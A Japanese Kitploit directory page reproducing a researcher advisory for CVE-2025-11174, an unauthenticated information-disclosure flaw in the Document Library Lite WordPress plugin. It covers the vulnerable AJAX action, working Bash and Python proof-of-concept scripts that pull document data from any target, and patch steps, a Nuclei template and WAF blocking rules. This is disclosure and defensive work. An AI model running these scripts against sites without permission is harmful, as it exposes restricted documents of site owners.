Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - 認可の欠如による機密情報の漏えい | CVE-2025-11174 | Kitploit
ツール/GitHubGitHub/snailsploit/cve-2025-11174
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - 認可の欠如による機密情報の漏えい | CVE-2025-11174

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-11174: Document Library Lite WordPress プラグインにおける認証なし情報漏洩

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

キーワード: CVE-2025-11174, Document Library Lite 脆弱性, 情報漏洩, WordPress セキュリティ, 認証なし AJAX エクスプロイト, WordPress プラグイン脆弱性, CWE-862, WordPress ドキュメントプラグインセキュリティ, 認証バイパス, WordPress CVE 2025

目次

  • 概要
  • 脆弱性の詳細
  • 技術的分析
  • 攻撃ベクトル
  • 概念実証
  • 修復ガイド
  • 検出
  • CVSS メトリクス
  • 参考文献
  • クレジット
  • セキュリティ連絡先

概要

Document Library Lite WordPress プラグイン情報漏洩脆弱性 (CVE-2025-11174) - WordPress 文書ライブラリプラグインにおいて、認証なしで機密文書データにアクセスできるセキュリティ上の欠陥です。

Document Library Lite WordPress プラグインに重大な認証バイパス脆弱性が発見され、認証を受けていない攻撃者が適切な認証なしに機密文書情報にアクセスできることが判明しました。

発見者: Kai Aizen & Avraham Shemesh (SnailSploit)
公開日: 2025年11月1日
CVSS スコア: 5.3 (Medium)
CWE: CWE-862 - 認証の欠如
プラグイン: Document Library Lite
ベンダー: Barn2 Plugins
攻撃タイプ: 認証なし情報漏洩
必要な権限: なし (未認証攻撃)

脆弱性の詳細

説明

WordPress 用 Document Library Lite プラグインは、バージョン 1.1.6 までのすべてのバージョンにおいて、不適切な認可の脆弱性を含んでいます。このプラグインは、nonce や権限チェックを行わずに文書データの JSON テーブルを返す、認証なしの AJAX アクション dll_load_posts を公開しています。

影響

この脆弱性により、認証されていない攻撃者は次のことが可能になります:

  • 認証なしで文書メタデータにアクセス
  • 制限されるべき文書一覧を取得
  • 認証ユーザーのみを対象とした文書情報を表示
  • Document Library に保存されている文書を列挙

注意: CVSS スコア 5.3 (Medium) は限定的な情報漏洩を反映しています。この脆弱性により文書データへの認証なしアクセスが可能になりますが、機密性への影響は Low と評価され、完全性や可用性への影響はありません。

影響を受けるバージョン

  • 脆弱: バージョン 1.1.6 以下
  • 修正済み: バージョン 1.1.7 以上

CVSS v3.1 メトリクス

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 内訳:

  • 攻撃元区分 (AV): ネットワーク - ネットワークを介してリモートから悪用可能
  • 攻撃条件の複雑さ (AC): 低 - 悪用に特別な条件は不要
  • 必要な特権レベル (PR): 不要 - 認証や特権は不要
  • ユーザー関与レベル (UI): 不要 - ユーザーの操作なしで悪用可能
  • スコープ (S): 変更なし - 脆弱性は影響を受けるコンポーネントのみに影響
  • 機密性への影響 (C): 低 - 限定的な情報漏洩
  • 完全性への影響 (I): なし - 完全性への影響なし
  • 可用性への影響 (A): なし - 可用性への影響なし

技術的詳細

脆弱性の根本原因

AJAX アクション dll_load_posts は、適切な認証や認可チェックなしで登録されています:

root@kitploit:~
// 脆弱なコードパターン(簡略化)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

wp_ajax_nopriv_ プレフィックスは、このアクションが認証されていないユーザーにもアクセス可能であることを示しており、コールバック関数では次の処理が実装されていません:

  • Nonce 検証
  • 権限チェック
  • ユーザー認証の確認

攻撃ベクトル

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

この脆弱性は、認証なしで WordPress の admin-ajax.php エンドポイントを通じて悪用可能です。

概念実証

⚠️ 教育および許可されたテスト目的のみ

Bash PoC

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

Python PoC

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

修復

サイト管理者向け

直ちに必要な措置:

  1. Document Library Lite をバージョン 1.1.7 以降に直ちに更新する
  2. サイトのアクセスログで、admin-ajax.php への action=dll_load_posts を含む不審な POST リクエストを確認する
  3. すぐに更新できない場合は、プラグインを一時的に無効化することを検討する

更新手順

WordPress 管理画面から:

  1. WordPress 管理画面で プラグイン > インストール済みプラグイン に移動
  2. "Document Library Lite" を見つける
  3. 今すぐ更新 をクリックしてバージョン 1.1.7 以降にアップグレード
  4. 更新が成功したことを確認する

WP-CLI を使用:

root@kitploit:~
wp plugin update document-library-lite

プラグイン開発者向け

すべての AJAX ハンドラに適切なセキュリティ制御を実装してください:

root@kitploit:~
// 適切な AJAX セキュリティの例
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Nonce を検証
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }
    
    // 権限をチェック
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }
    
    // ここに安全なコードを記述
}

検出

WordPress プラグインチェック

root@kitploit:~
# 脆弱なバージョンがインストールされているか確認
wp plugin list | grep -i "document-library-lite"

セキュリティスキャナールール

Nuclei テンプレート:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Web アプリケーションファイアウォールルール

ModSecurity ルール:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Nginx/OpenResty ルール:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

タイムライン

  • 2025年11月1日 - 脆弱性が公開
  • 2025年11月1日 - CVE レコード公開
  • 2025年11月 - パッチリリース (バージョン 1.1.7)

参考文献

  • CVE-2025-11174 - CVE.org
  • GitHub Advisory Database
  • Wordfence Intelligence
  • WordPress Plugin Directory

クレジット

研究者:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

開示プロセス: 協調的な開示

免責事項

この情報は、セキュリティ研究および防御目的でのみ提供されます。この脆弱性を悪意のある目的で悪用することは違法かつ非倫理的です。所有していないシステムをテストする前に、必ず適切な許可を取得してください。

連絡先

この脆弱性に関する質問や追加情報については:

  • メール: [email protected]
  • ウェブサイト: snailsploit.com
  • 組織: SnailSploit Security Research

最終更新日: 2025年11月2日


📚 ドキュメントと著者

このプロジェクトの完全な書き起こし、方法論、および関連する研究は以下にあります:

https://snailsploit.com/security-research/cves/cve-2025-11174/

作成者: Kai Aizen — 独立した攻撃的セキュリティ研究者。

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Same attack. Different substrate.

ツールをダウンロード
メトリクス値
攻撃元区分ネットワーク (AV:N)
攻撃条件の複雑さ低 (AC:L)
必要な特権レベル不要 (PR:N)
ユーザー関与レベル不要 (UI:N)
スコープ変更なし (S:U)
機密性への影響低 (C:L)
完全性への影響なし (I:N)
可用性への影響なし (A:N)